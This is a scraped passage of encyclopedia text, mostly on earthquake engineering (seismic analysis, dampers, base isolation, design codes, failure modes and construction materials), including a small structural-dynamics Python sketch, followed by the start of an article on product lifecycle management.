structures,[7]or withgravity wavesfromtsunami. The loading that is expected at a given location on the Earth's surface is estimated by engineeringseismology. It is related to theseismic hazardof the location. Earthquakeorseismic performancedefines a structure's ability to sustain its main functions, such as itssafetyandserviceability,atandaftera particular earthquake exposure. A structure is normally consideredsafeif it does not endanger the lives andwell-beingof those in or around it by partially or completely collapsing. A structure may be consideredserviceableif it is able to fulfill its operational functions for which it was designed. Basic concepts of the earthquake engineering, implemented in the major building codes, assume that a building should survive a rare, very severe earthquake by sustaining significant damage but without globally collapsing.[8]On the other hand, it should remain operational for more frequent, but less severe seismic events. Engineers need to know the quantified level of the actual or anticipated seismic performance associated with the direct damage to an individual building subject to a specified ground shaking. Such an assessment may be performed either experimentally or analytically.[citation needed] Experimental evaluations are expensive tests that are typically done by placing a (scaled) model of the structure on ashake-tablethat simulates the earth shaking and observing its behavior.[9]Such kinds of experiments were first performed more than a century ago.[10]Only recently has it become possible to perform 1:1 scale testing on full structures. Due to the costly nature of such tests, they tend to be used mainly for understanding the seismic behavior of structures, validating models and verifying analysis methods. 
Thus, once properly validated, computational models and numerical procedures tend to carry the major burden for the seismic performance assessment of structures.

Seismic performance assessment or seismic structural analysis is a powerful tool of earthquake engineering which utilizes detailed modelling of the structure together with methods of structural analysis to gain a better understanding of the seismic performance of building and non-building structures. The technique as a formal concept is a relatively recent development. In general, seismic structural analysis is based on the methods of structural dynamics.[11] For decades, the most prominent instrument of seismic analysis has been the earthquake response spectrum method, which also contributed to the concept embodied in today's building codes.[12] However, such methods are good only for linear elastic systems, being largely unable to model structural behavior when damage (i.e., non-linearity) appears. Numerical step-by-step integration proved to be a more effective method of analysis for multi-degree-of-freedom structural systems with significant non-linearity under a transient process of ground motion excitation;[13] a minimal sketch of such an integration for a single degree of freedom is given below. Use of the finite element method is one of the most common approaches for analyzing non-linear soil-structure interaction computer models.

Basically, numerical analysis is conducted in order to evaluate the seismic performance of buildings. Performance evaluations are generally carried out using nonlinear static pushover analysis or nonlinear time-history analysis. In such analyses, it is essential to achieve accurate non-linear modeling of structural components such as beams, columns, beam-column joints, and shear walls. Thus, experimental results play an important role in determining the modeling parameters of individual components, especially those that are subject to significant non-linear deformations. The individual components are then assembled to create a full non-linear model of the structure, and the models thus created are analyzed to evaluate the performance of buildings.[citation needed]

The capabilities of structural analysis software are a major consideration in the above process, as they restrict the possible component models and the analysis methods available and, most importantly, determine the numerical robustness. The latter becomes a major consideration for structures that venture into the non-linear range and approach global or local collapse, as the numerical solution becomes increasingly unstable and thus difficult to reach. There are several commercially available finite element analysis packages, such as CSI-SAP2000, CSI-PERFORM-3D, MTR/SASSI, Scia Engineer-ECtools, ABAQUS, and Ansys, all of which can be used for the seismic performance evaluation of buildings. Moreover, there are research-based finite element analysis platforms such as OpenSees, MASTODON (which is based on the MOOSE Framework), RUAUMOKO, and the older DRAIN-2D/3D, several of which are now open source.[citation needed]
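The step-by-step integration mentioned above can be sketched for the simplest case: a linear single-degree-of-freedom oscillator under ground acceleration, integrated with the average-acceleration Newmark method (assuming NumPy; the record below is synthetic and the parameter values are illustrative only):

```python
import numpy as np

def newmark_sdof(ag, dt, period=1.0, zeta=0.05, beta=0.25, gamma=0.5):
    """Displacement response of a linear-elastic SDOF oscillator to
    ground acceleration ag (m/s^2), via the Newmark-beta method."""
    m = 1.0
    wn = 2.0 * np.pi / period          # natural circular frequency
    k = m * wn**2                      # stiffness
    c = 2.0 * zeta * m * wn            # viscous damping
    n = len(ag)
    u, v, a = np.zeros(n), np.zeros(n), np.zeros(n)
    a[0] = -ag[0]                      # equation of motion at t = 0 (u = v = 0)
    k_eff = k + gamma * c / (beta * dt) + m / (beta * dt**2)
    for i in range(n - 1):
        p_eff = (-m * ag[i + 1]
                 + m * (u[i] / (beta * dt**2) + v[i] / (beta * dt)
                        + (1 / (2 * beta) - 1) * a[i])
                 + c * (gamma * u[i] / (beta * dt) + (gamma / beta - 1) * v[i]
                        + dt * (gamma / (2 * beta) - 1) * a[i]))
        u[i + 1] = p_eff / k_eff
        a[i + 1] = ((u[i + 1] - u[i]) / (beta * dt**2)
                    - v[i] / (beta * dt) - (1 / (2 * beta) - 1) * a[i])
        v[i + 1] = v[i] + dt * ((1 - gamma) * a[i] + gamma * a[i + 1])
    return u

# Synthetic 10 s pulse-like record sampled at 100 Hz (illustrative only).
dt = 0.01
t = np.arange(0.0, 10.0, dt)
ag = 3.0 * np.exp(-t) * np.sin(2.0 * np.pi * 2.0 * t)
print(f"peak displacement: {np.abs(newmark_sdof(ag, dt)).max():.4f} m")
```

Non-linear analysis follows the same time-stepping skeleton, but the stiffness and restoring force are updated at each step from the component models discussed above.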
Research for earthquake engineering means both field and analytical investigation or experimentation intended for discovery and scientific explanation of earthquake engineering related facts, revision of conventional concepts in the light of new findings, and practical application of the developed theories. The National Science Foundation (NSF) is the main United States government agency that supports fundamental research and education in all fields of earthquake engineering. In particular, it focuses on experimental, analytical and computational research on design and performance enhancement of structural systems. The Earthquake Engineering Research Institute (EERI) is a leader in the dissemination of earthquake engineering research related information both in the U.S. and globally.

A definitive list of earthquake engineering research related shaking tables around the world may be found in Experimental Facilities for Earthquake Engineering Simulation Worldwide.[14] The most prominent of them is now the E-Defense shake table in Japan.[15]

The NSF Hazard Mitigation and Structural Engineering program (HMSE) supports research on new technologies for improving the behaviour and response of structural systems subject to earthquake hazards; fundamental research on safety and reliability of constructed systems; innovative developments in analysis and model-based simulation of structural behaviour and response, including soil-structure interaction; design concepts that improve structure performance and flexibility; and application of new control techniques for structural systems.[16]

NSF also supports the George E. Brown Jr. Network for Earthquake Engineering Simulation (NEES), which advances knowledge discovery and innovation for earthquake and tsunami loss reduction of the nation's civil infrastructure, and new experimental simulation techniques and instrumentation.[17] The NEES network features 14 geographically distributed, shared-use laboratories that support several types of experimental work:[17] geotechnical centrifuge research, shake-table tests, large-scale structural testing, tsunami wave basin experiments, and field site research.[18] Participating universities include: Cornell University; Lehigh University; Oregon State University; Rensselaer Polytechnic Institute; University at Buffalo, State University of New York; University of California, Berkeley; University of California, Davis; University of California, Los Angeles; University of California, San Diego; University of California, Santa Barbara; University of Illinois, Urbana-Champaign; University of Minnesota; University of Nevada, Reno; and the University of Texas, Austin.[17]

The equipment sites (labs) and a central data repository are connected to the global earthquake engineering community via the NEEShub website. The NEES website is powered by HUBzero software developed at Purdue University for nanoHUB specifically to help the scientific community share resources and collaborate. The cyberinfrastructure, connected via Internet2, provides interactive simulation tools, a simulation tool development area, a curated central data repository, animated presentations, user support, telepresence, a mechanism for uploading and sharing resources, and statistics about users and usage patterns. This cyberinfrastructure allows researchers to: securely store, organize and share data within a standardized framework in a central location; remotely observe and participate in experiments through the use of synchronized real-time data and video; collaborate with colleagues to facilitate the planning, performance, analysis, and publication of research experiments; and conduct computational and hybrid simulations that may combine the results of multiple distributed experiments and link physical experiments with computer simulations to enable the investigation of overall system performance. These resources jointly provide the means for collaboration and discovery to improve the seismic design and performance of civil and mechanical infrastructure systems.
The very first earthquake simulations were performed by statically applying some horizontal inertia forces, based on scaled peak ground accelerations, to a mathematical model of a building.[19] With the further development of computational technologies, static approaches began to give way to dynamic ones. Dynamic experiments on building and non-building structures may be physical, like shake-table testing, or virtual. In both cases, to verify a structure's expected seismic performance, some researchers prefer to deal with so-called "real time-histories", though these cannot be "real" for a hypothetical earthquake specified by either a building code or by particular research requirements. Therefore, there is a strong incentive to use an earthquake simulation: a seismic input that possesses only the essential features of a real event. Sometimes earthquake simulation is understood as a re-creation of the local effects of strong earth shaking. Theoretical or experimental evaluation of anticipated seismic performance mostly requires a structure simulation, which is based on the concept of structural likeness or similarity. Similarity is some degree of analogy or resemblance between two or more objects. The notion of similarity rests either on exact or approximate repetitions of patterns in the compared items. In general, a building model is said to have similarity with the real object if the two share geometric similarity, kinematic similarity and dynamic similarity. The most vivid and effective type of similarity is the kinematic one. Kinematic similarity exists when the paths and velocities of moving particles of a model and its prototype are similar. The ultimate level of kinematic similarity is kinematic equivalence, when, in the case of earthquake engineering, the time-histories of each story's lateral displacements of the model and its prototype would be the same. Seismic vibration control is a set of technical means aimed at mitigating seismic impacts in building and non-building structures. All seismic vibration control devices may be classified as passive, active or hybrid,[21] where passive devices operate without an external power source, active devices counteract the motion in real time using sensors and powered actuators, and hybrid devices combine features of both. When ground seismic waves reach the base of a building and start to penetrate it, their energy flow density, due to reflections, reduces dramatically: usually, up to 90%. However, the remaining portions of the incident waves during a major earthquake still bear a huge devastating potential. After the seismic waves enter a superstructure, there are a number of ways to control them in order to mitigate their damaging effect and improve the building's seismic performance, for instance by dissipating the wave energy inside the superstructure with properly engineered dampers, by dispersing the wave energy between a wider range of frequencies, or by absorbing the resonant portions of the wave frequency band with the help of so-called mass dampers. Devices of the last kind, abbreviated correspondingly as TMD for the tuned (passive), AMD for the active, and HMD for the hybrid mass dampers, have been studied and installed in high-rise buildings, predominantly in Japan, for a quarter of a century.[24] However, there is quite another approach: partial suppression of the seismic energy flow into the superstructure, known as seismic or base isolation. For this, some pads are inserted into or under all major load-carrying elements in the base of the building, which should substantially decouple the superstructure from its substructure resting on the shaking ground. The first evidence of earthquake protection by using the principle of base isolation was discovered in Pasargadae, a city in ancient Persia, now Iran, and dates back to the 6th century BCE. Below are some samples of seismic vibration control technologies of today.
Peru is a highly seismic land; for centuries the dry-stone construction proved to be more earthquake-resistant than construction using mortar. The people of the Inca civilization were masters of the polished 'dry-stone walls', called ashlar, where blocks of stone were cut to fit together tightly without any mortar. The Incas were among the best stonemasons the world has ever seen,[25] and many junctions in their masonry were so perfect that even blades of grass could not fit between the stones. The stones of the dry-stone walls built by the Incas could move slightly and resettle without the walls collapsing, a passive structural control technique employing both the principle of energy dissipation (Coulomb damping) and that of suppressing resonant amplifications.[26] Typically, tuned mass dampers are huge concrete blocks mounted in skyscrapers or other structures that move in opposition to the resonance frequency oscillations of the structures by means of some sort of spring mechanism. The Taipei 101 skyscraper needs to withstand typhoon winds and earthquake tremors common in this area of Asia/Pacific. For this purpose, a steel pendulum weighing 660 metric tonnes that serves as a tuned mass damper was designed and installed atop the structure. Suspended from the 92nd to the 88th floor, the pendulum sways to decrease resonant amplifications of lateral displacements in the building caused by earthquakes and strong gusts. A hysteretic damper is intended to provide better and more reliable seismic performance than that of a conventional structure by increasing the dissipation of seismic input energy.[27] There are five major groups of hysteretic dampers used for the purpose. Viscous dampers have the benefit of being a supplemental damping system. They have an oval hysteretic loop, and the damping is velocity dependent. While some minor maintenance is potentially required, viscous dampers generally do not need to be replaced after an earthquake. While more expensive than other damping technologies, they can be used for both seismic and wind loads and are the most commonly used hysteretic damper.[28] Friction dampers tend to be available in two major types, linear and rotational, and dissipate energy by heat. The damper operates on the principle of a Coulomb damper. Depending on the design, friction dampers can experience the stick-slip phenomenon and cold welding. Their main disadvantage is that friction surfaces can wear over time, and for this reason they are not recommended for dissipating wind loads. When used in seismic applications wear is not a problem, and there is no required maintenance. They have a rectangular hysteretic loop, and as long as the building is sufficiently elastic they tend to settle back to their original positions after an earthquake. Metallic yielding dampers, as the name implies, yield in order to absorb the earthquake's energy. This type of damper absorbs a large amount of energy; however, they must be replaced after an earthquake and may prevent the building from settling back to its original position. Viscoelastic dampers are useful in that they can be used for both wind and seismic applications, but they are usually limited to small displacements. There is some concern as to the reliability of the technology, as some brands have been banned from use in buildings in the United States. Base isolation seeks to prevent the kinetic energy of the earthquake from being transferred into elastic energy in the building. These technologies do so by isolating the structure from the ground, thus enabling it to move somewhat independently.
The degree to which the energy is transferred into the structure, and how the energy is dissipated, will vary depending on the technology used. The lead rubber bearing, or LRB, is a type of base isolation employing heavy damping. It was invented by Bill Robinson, a New Zealander.[29] Heavy damping mechanisms incorporated in vibration control technologies, and particularly in base isolation devices, are often considered a valuable means of suppressing vibrations and thus enhancing a building's seismic performance. However, for rather pliant systems such as base-isolated structures, with a relatively low bearing stiffness but with high damping, the so-called "damping force" may turn out to be the main pushing force in a strong earthquake. The video[30] shows a lead rubber bearing being tested at the UCSD Caltrans-SRMD facility. The bearing is made of rubber with a lead core. It was a uniaxial test in which the bearing was also under a full structure load. Many buildings and bridges, both in New Zealand and elsewhere, are protected with lead dampers and lead and rubber bearings. Te Papa Tongarewa, the national museum of New Zealand, and the New Zealand Parliament Buildings have been fitted with the bearings. Both are in Wellington, which sits on an active fault.[29] A springs-with-damper base isolator installed under a three-story townhouse in Santa Monica, California, is shown in a photo taken prior to the 1994 Northridge earthquake. It is a base isolation device conceptually similar to the lead rubber bearing. One of two three-story townhouses like this, which was well instrumented for recording both vertical and horizontal accelerations on its floors and the ground, survived severe shaking during the Northridge earthquake and left valuable recorded information for further study. The simple roller bearing is a base isolation device intended to protect various building and non-building structures against the potentially damaging lateral impacts of strong earthquakes. This metallic bearing support may be adapted, with certain precautions, as a seismic isolator for skyscrapers and buildings on soft ground. Recently, it has been employed under the name of metallic roller bearing for a 17-story housing complex in Tokyo, Japan.[31] Friction pendulum bearing (FPB) is another name for the friction pendulum system (FPS). It is based on three pillars:[32] an articulated friction slider, a spherical concave sliding surface, and an enclosing cylinder for lateral displacement restraint. A shake-table test of an FPB system supporting a rigid building model is shown in a linked video clip. Seismic design is based on authorized engineering procedures, principles and criteria meant to design or retrofit structures subject to earthquake exposure.[19] Those criteria are only consistent with the contemporary state of knowledge about earthquake engineering structures.[33] Therefore, a building design which exactly follows seismic code regulations does not guarantee safety against collapse or serious damage.[34] The price of poor seismic design may be enormous. Nevertheless, seismic design has always been a trial-and-error process, whether it was based on physical laws or on empirical knowledge of the structural performance of different shapes and materials.
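Modern codes typically reduce this design problem to a set of tractable checks. As a simplified illustration (the form below follows common U.S. practice in the spirit of ASCE 7 and is not taken from the text above; code caps, floors, and site factors are omitted), the equivalent lateral force procedure sizes a design base shear $V$ from the effective seismic weight $W$:

$$V = C_s W, \qquad C_s = \frac{S_{DS}}{R / I_e},$$

where $S_{DS}$ is the design spectral response acceleration, $R$ is the response modification factor rewarding ductile systems, and $I_e$ is the importance factor. With assumed values $S_{DS} = 1.0$, $R = 8$ and $I_e = 1.0$, a building with $W = 20{,}000$ kN would be designed for a base shear of $V = 0.125 \times 20{,}000 = 2{,}500$ kN, distributed over the height of the structure.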
To practice seismic design, seismic analysis or seismic evaluation of new and existing civil engineering projects, an engineer should normally pass an examination on Seismic Principles,[35] which, in the State of California, covers a prescribed set of topics. To build up complex structural systems,[36] seismic design largely uses the same relatively small number of basic structural elements (to say nothing of vibration control devices) as any non-seismic design project. Normally, according to building codes, structures are designed to "withstand" the largest earthquake of a certain probability that is likely to occur at their location. This means the loss of life should be minimized by preventing collapse of the buildings. Seismic design is carried out by understanding the possible failure modes of a structure and providing the structure with appropriate strength, stiffness, ductility, and configuration[37] to ensure those modes cannot occur. Seismic design requirements depend on the type of structure, the locality of the project, and its authorities, which stipulate applicable seismic design codes and criteria.[8] For instance, the California Department of Transportation's requirements, called The Seismic Design Criteria (SDC) and aimed at the design of new bridges in California,[38] incorporate an innovative seismic performance-based approach. The most significant feature of the SDC design philosophy is a shift from a force-based assessment of seismic demand to a displacement-based assessment of demand and capacity. Thus, the newly adopted displacement approach is based on comparing the elastic displacement demand to the inelastic displacement capacity of the primary structural components, while ensuring a minimum level of inelastic capacity at all potential plastic hinge locations. In addition to the designed structure itself, seismic design requirements may include ground stabilization underneath the structure: sometimes, heavily shaken ground breaks up, which leads to collapse of the structure sitting upon it.[40] The following topics should be of primary concern: liquefaction; dynamic lateral earth pressures on retaining walls; seismic slope stability; earthquake-induced settlement.[41] Nuclear facilities should not jeopardise their safety in case of earthquakes or other hostile external events. Therefore, their seismic design is based on criteria far more stringent than those applying to non-nuclear facilities.[42] The Fukushima I nuclear accidents and damage to other nuclear facilities that followed the 2011 Tōhoku earthquake and tsunami have, however, drawn attention to ongoing concerns over Japanese nuclear seismic design standards and caused many other governments to re-evaluate their nuclear programs. Doubt has also been expressed over the seismic evaluation and design of certain other plants, including the Fessenheim Nuclear Power Plant in France. Failure mode is the manner by which an earthquake-induced failure is observed. It generally describes the way the failure occurs. Though costly and time-consuming, learning from each real earthquake failure remains a routine recipe for advancement in seismic design methods. Below, some typical modes of earthquake-generated failures are presented. The lack of reinforcement, coupled with poor mortar and inadequate roof-to-wall ties, can result in substantial damage to an unreinforced masonry building. Severely cracked or leaning walls are among the most common forms of earthquake damage. Also hazardous is the damage that may occur between the walls and roof or floor diaphragms.
Separation between the framing and the walls can jeopardize the vertical support of roof and floor systems. Soft story effect: absence of adequate stiffness at the ground level caused damage to the structure pictured. A close examination of the image reveals that the rough board siding, once covered by a brick veneer, has been completely dismantled from the studwall. Only the rigidity of the floor above, combined with the support on the two hidden sides by continuous walls not penetrated with large doors as on the street sides, is preventing full collapse of the structure. Soil liquefaction: in cases where the soil consists of loose granular deposited materials with the tendency to develop excessive hydrostatic pore water pressure of sufficient magnitude and to compact, liquefaction of those loose saturated deposits may result in non-uniform settlements and tilting of structures. This caused major damage to thousands of buildings in Niigata, Japan during the 1964 earthquake.[43] Landslide rock fall: a landslide is a geological phenomenon which includes a wide range of ground movement, including rock falls. Typically, the action of gravity is the primary driving force for a landslide to occur, though in this case there was another contributing factor which affected the original slope stability: the landslide required an earthquake trigger before being released. Pounding against an adjacent building: this is a photograph of the collapsed five-story tower of St. Joseph's Seminary, Los Altos, California, whose collapse resulted in one fatality. During the Loma Prieta earthquake, the tower pounded against the independently vibrating adjacent building behind it. The possibility of pounding depends on both buildings' lateral displacements, which should be accurately estimated and accounted for. In the Northridge earthquake, the Kaiser Permanente concrete frame office building had joints completely shattered, revealing inadequate confinement steel, which resulted in the second story collapse. In the transverse direction, composite end shear walls, consisting of two wythes of brick and a layer of shotcrete that carried the lateral load, peeled apart because of inadequate through-ties and failed. Sliding off foundations: the effect on a relatively rigid residential building structure during the 1987 Whittier Narrows earthquake. The magnitude 5.9 earthquake pounded the Garvey West Apartment building in Monterey Park, California and shifted its superstructure about 10 inches to the east on its foundation. If a superstructure is not mounted on a base isolation system, its shifting off the basement should be prevented. A reinforced concrete column burst in the Northridge earthquake due to an insufficient shear reinforcement mode, which allowed the main reinforcement to buckle outwards. The deck unseated at the hinge and failed in shear. As a result, the La Cienega-Venice underpass section of the 10 Freeway collapsed. Loma Prieta earthquake: side view of the reinforced concrete support-column failure which triggered the collapse of the upper deck onto the lower deck of the two-level Cypress viaduct of Interstate Highway 880, Oakland, CA. Retaining wall failure in the Loma Prieta earthquake in the Santa Cruz Mountains area: prominent northwest-trending extensional cracks up to 12 cm (4.7 in) wide in the concrete spillway to Austrian Dam, the north abutment. Ground shaking triggered soil liquefaction in a subsurface layer of sand, producing differential lateral and vertical movement in an overlying carapace of unliquefied sand and silt.
This mode of ground failure, termed lateral spreading, is a principal cause of liquefaction-related earthquake damage.[44] In the severely damaged building of the Agriculture Development Bank of China after the 2008 Sichuan earthquake, most of the beams and pier columns were sheared. Large diagonal cracks in the masonry and veneer were due to in-plane loads, while the abrupt settlement of the right end of the building should be attributed to a landfill, which may be hazardous even without any earthquake.[45] Tsunami impact is twofold: the hydraulic pressure of sea waves and inundation. Thus, the Indian Ocean earthquake of December 26, 2004, with its epicenter off the west coast of Sumatra, Indonesia, triggered a series of devastating tsunamis, killing more than 230,000 people in eleven countries by inundating surrounding coastal communities with huge waves up to 30 meters (100 feet) high.[47] Earthquake construction means the implementation of seismic design to enable building and non-building structures to live through the anticipated earthquake exposure up to expectations and in compliance with the applicable building codes. Design and construction are intimately related. To achieve good workmanship, detailing of the members and their connections should be as simple as possible. As with any construction in general, earthquake construction is a process that consists of the building, retrofitting or assembling of infrastructure given the construction materials available.[48] The destabilizing action of an earthquake on constructions may be direct (seismic motion of the ground) or indirect (earthquake-induced landslides, soil liquefaction and waves of tsunami). A structure might have all the appearances of stability, yet offer nothing but danger when an earthquake occurs.[49] The crucial fact is that, for safety, earthquake-resistant construction techniques are as important as quality control and using correct materials. An earthquake contractor should be registered in the state/province/country of the project location (depending on local regulations), bonded and insured[citation needed]. To minimize possible losses, the construction process should be organized keeping in mind that an earthquake may strike at any time prior to the end of construction. Each construction project requires a qualified team of professionals who understand the basic features of the seismic performance of different structures as well as construction management. Around thirty percent of the world's population lives or works in earth-made construction.[50] Adobe, a type of mud brick, is one of the oldest and most widely used building materials. The use of adobe is very common in some of the world's most hazard-prone regions, traditionally across Latin America, Africa, the Indian subcontinent and other parts of Asia, the Middle East and Southern Europe. Adobe buildings are considered very vulnerable in strong quakes.[51] However, multiple ways of seismic strengthening of new and existing adobe buildings are available.[52] There are several key factors for the improved seismic performance of adobe construction. Limestone is very common in architecture, especially in North America and Europe. Many landmarks across the world are made of limestone. Many medieval churches and castles in Europe are made of limestone and sandstone masonry. They are long-lasting materials, but their rather heavy weight is not beneficial for adequate seismic performance. Application of modern technology to seismic retrofitting can enhance the survivability of unreinforced masonry structures.
As an example, from 1973 to 1989, the Salt Lake City and County Building in Utah was exhaustively renovated and repaired with an emphasis on preserving historical accuracy in appearance. This was done in concert with a seismic upgrade that placed the weak sandstone structure on a base isolation foundation to better protect it from earthquake damage. Timber framing dates back thousands of years and has been used in many parts of the world during various periods, such as ancient Japan, Europe and medieval England, in localities where timber was in good supply and building stone and the skills to work it were not. The use of timber framing in buildings provides a complete skeletal frame which offers some structural benefits, as the timber frame, if properly engineered, lends itself to better seismic survivability.[54] Light-frame structures usually gain seismic resistance from rigid plywood shear walls and wood structural panel diaphragms.[55] Special provisions for seismic load-resisting systems for all engineered wood structures require consideration of diaphragm ratios, horizontal and vertical diaphragm shears, and connector/fastener values. In addition, collectors, or drag struts, to distribute shear along a diaphragm length are required. A construction system where steel reinforcement is embedded in the mortar joints of masonry or placed in holes that are then filled with concrete or grout is called reinforced masonry.[56] There are various practices and techniques to reinforce masonry. The most common type is reinforced hollow unit masonry. To achieve ductile behavior in masonry, it is necessary that the shear strength of the wall be greater than the flexural strength.[57] The effectiveness of both vertical and horizontal reinforcement depends on the type and quality of the masonry units and mortar. The devastating 1933 Long Beach earthquake revealed that masonry is prone to earthquake damage, which led to the California State Code making masonry reinforcement mandatory across California. Reinforced concrete is concrete in which steel reinforcement bars (rebars) or fibers have been incorporated to strengthen a material that would otherwise be brittle. It can be used to produce beams, columns, floors or bridges. Prestressed concrete is a kind of reinforced concrete used for overcoming concrete's natural weakness in tension. It can be applied to beams, floors or bridges with a longer span than is practical with ordinary reinforced concrete. Prestressing tendons (generally of high-tensile steel cable or rods) are used to provide a clamping load which produces a compressive stress that offsets the tensile stress that the concrete compression member would otherwise experience due to a bending load (a simplified worked illustration follows this passage). To prevent catastrophic collapse in response to earth shaking (in the interest of life safety), a traditional reinforced concrete frame should have ductile joints. Depending upon the methods used and the imposed seismic forces, such buildings may be immediately usable, require extensive repair, or may have to be demolished.
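As a simplified worked illustration of that clamping effect (the numbers are invented, and the treatment ignores prestress losses and tendon eccentricity): for a simply supported beam of cross-sectional area $A$ and section modulus $S$, an axial prestress force $P$ and a service bending moment $M$ combine at the bottom fiber as

$$\sigma_{\text{bottom}} = -\frac{P}{A} + \frac{M}{S},$$

with compression taken as negative. With $A = 0.12\ \text{m}^2$, $S = 0.01\ \text{m}^3$, $P = 1{,}200\ \text{kN}$ and $M = 80\ \text{kN·m}$, the bending term $M/S = 8\ \text{MPa}$ is fully offset by the clamping term $P/A = 10\ \text{MPa}$, so the bottom fiber stays in compression (at $-2\ \text{MPa}$) and the concrete never experiences the tension it is weak against.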
A prestressed structure is one whose overall integrity, stability and security depend, primarily, on prestressing. Prestressing means the intentional creation of permanent stresses in a structure for the purpose of improving its performance under various service conditions.[58] There are several basic types of prestressing. Today, the concept of the prestressed structure is widely engaged in the design of buildings, underground structures, TV towers, power stations, floating storage and offshore facilities, nuclear reactor vessels, and numerous kinds of bridge systems.[59] The beneficial idea of prestressing was apparently familiar to the ancient Roman architects; note, for example, the tall attic wall of the Colosseum working as a stabilizing device for the wall piers beneath. Steel structures are considered mostly earthquake resistant, but some failures have occurred. A great number of welded steel moment-resisting frame buildings, which looked earthquake-proof, surprisingly experienced brittle behavior and were hazardously damaged in the 1994 Northridge earthquake.[60] After that, the Federal Emergency Management Agency (FEMA) initiated development of repair techniques and new design approaches to minimize damage to steel moment frame buildings in future earthquakes.[61] For structural steel seismic design based on the Load and Resistance Factor Design (LRFD) approach, it is very important to assess the ability of a structure to develop and maintain its bearing resistance in the inelastic range. A measure of this ability is ductility, which may be observed in a material itself, in a structural element, or in a whole structure. As a consequence of the Northridge earthquake experience, the American Institute of Steel Construction has introduced AISC 358, "Prequalified Connections for Special and Intermediate Steel Moment Frames". The AISC Seismic Design Provisions require that all steel moment resisting frames employ either connections contained in AISC 358 or connections that have been subjected to pre-qualifying cyclic testing.[62] Earthquake loss estimation is usually defined in terms of a Damage Ratio (DR), the ratio of the earthquake damage repair cost to the total value of a building.[63] Probable Maximum Loss (PML) is a common term used for earthquake loss estimation, but it lacks a precise definition. In 1999, ASTM E2026, 'Standard Guide for the Estimation of Building Damageability in Earthquakes', was produced in order to standardize the nomenclature for seismic loss estimation, as well as to establish guidelines for the review process and the qualifications of the reviewer.[64] Earthquake loss estimations are also referred to as seismic risk assessments. The risk assessment process generally involves determining the probability of various ground motions coupled with the vulnerability or damage of the building under those ground motions. The results are defined as a percent of building replacement value.[65]
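To make the Damage Ratio concrete (the figures below are invented for illustration):

$$DR = \frac{\text{repair cost}}{\text{building replacement value}},$$

so an earthquake that causes \$150,000 of repairable damage to a building valued at \$1,000,000 corresponds to $DR = 0.15$, i.e., a 15% loss. A PML study is often quoted as the same kind of ratio, evaluated for a postulated large, rare event at the site.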
https://en.wikipedia.org/wiki/Earthquake_engineering
In industry, product lifecycle management (PLM) is the process of managing the entire lifecycle of a product from its inception through engineering, design, and manufacture, as well as the service and disposal of manufactured products.[1][2] PLM integrates people, data, processes, and business systems and provides a product information backbone for companies and their extended enterprises.[3] The inspiration for the burgeoning business process now known as PLM came from American Motors Corporation (AMC).[4][5] The automaker was looking for a way to speed up its product development process to compete better against its larger competitors in 1985, according to François Castaing, Vice President for Product Engineering and Development.[6] AMC focused its R&D efforts on extending the product lifecycle of its flagship products, particularly Jeeps, because it lacked the "massive budgets of General Motors, Ford, and foreign competitors."[7] After introducing its compact Jeep Cherokee (XJ), the vehicle that launched the modern sport utility vehicle (SUV) market, AMC began development of a new model that later came out as the Jeep Grand Cherokee. The first part of its quest for faster product development was a computer-aided design (CAD) software system that made engineers more productive.[6] The second part of this effort was a new communication system that allowed conflicts to be resolved faster, as well as reducing costly engineering changes, because all drawings and documents were in a central database.[6] The product data management was so effective that, after Chrysler purchased AMC, the system was expanded throughout the enterprise, connecting everyone involved in designing and building products.[6] As an early adopter of PLM technology, Chrysler was able to become the auto industry's lowest-cost producer, recording development costs that were half of the industry average by the mid-1990s.[6] PLM systems help organizations cope with the increasing complexity and engineering challenges of developing new products for the global competitive markets.[8] Product lifecycle management (PLM) should be distinguished from product life-cycle management (marketing) (PLCM). PLM describes a product's engineering aspect, from managing its descriptions and properties through its development and useful life. In contrast, PLCM refers to the commercial management of a product's life in the business market with respect to costs and sales measures. Product lifecycle management can be considered one of the four cornerstones of a manufacturing corporation's information technology structure.[9] All companies need to manage communications and information with their customers (CRM, customer relationship management), their suppliers and fulfillment (SCM, supply chain management), their resources within the enterprise (ERP, enterprise resource planning) and their product planning and development (PLM). One form of PLM is called people-centric PLM. While traditional PLM tools have been deployed only on or during the release phase, people-centric PLM targets the design phase. As of 2009, ICT development (the EU-funded PROMISE project, 2004–2008) has allowed PLM to extend beyond traditional PLM and integrate sensor data and real-time 'lifecycle event data' into PLM, as well as allowing this information to be made available to different players in the total lifecycle of an individual product (closing the information loop). This broader reach has resulted in the extension of PLM into closed-loop lifecycle management (CL2M).
Documented benefits of product lifecycle management include:[10][11] Within PLM there are five primary areas. Note: while application software is not required for PLM processes, the business complexity and rate of change require organizations to execute as rapidly as possible. The core of PLM (product lifecycle management) is the creation and central management of all product data and the technology used to access this information and knowledge. PLM as a discipline emerged from tools such as CAD, CAM and PDM, but it can be viewed as the integration of these tools with methods, people and the processes through all stages of a product's life.[12][13] It is not just about software technology but is also a business strategy.[14] For simplicity, the stages described are shown in a traditional sequential engineering workflow. The exact order of events and tasks will vary according to the product and industry in question, but the main processes and major key-point events follow a common pattern.[15] The reality is, however, more complex: people and departments cannot perform their tasks in isolation, and one activity cannot simply finish before the next activity starts. Design is an iterative process; often designs need to be modified due to manufacturing constraints or conflicting requirements. Whether a customer order fits into the timeline depends on the industry type and whether the products are, for example, built to order, engineered to order, or assembled to order. Many software solutions have been developed to organize and integrate the different phases of a product's lifecycle. PLM should not be considered as a single software product, but as a collection of software tools and working methods integrated to address single stages of the lifecycle, connect different tasks, or manage the whole process. Some software providers cover the whole PLM range, while others have a single niche application. Some applications can span many fields of PLM with different modules within the same data model. An overview of the fields within PLM is covered here. The simple classifications do not always fit exactly; many areas overlap, and many software products cover more than one area or do not fit easily into one category. One of the main goals of PLM is to collect knowledge that can be reused for other projects and to coordinate the simultaneous concurrent development of many products. It is about business processes, people, and methods as much as software application solutions. Although PLM is mainly associated with engineering tasks, it also involves marketing activities such as product portfolio management (PPM), particularly with regard to new product development (NPD). Each industry has several life-cycle models to consider, but most are relatively similar. Below is one possible life-cycle model; while it emphasizes hardware-oriented products, similar phases would describe any form of product or service, including non-technical or software-based products:[16] The first stage is the definition of the product requirements based on the viewpoints of the customer, the company, the market, and regulatory bodies. From this specification, the product's major technical parameters can be defined. In parallel, the initial concept design work is performed, defining the aesthetics of the product together with its main functional aspects. Many different media are used for these processes, from pencil and paper to clay models to 3D CAID (computer-aided industrial design) software.
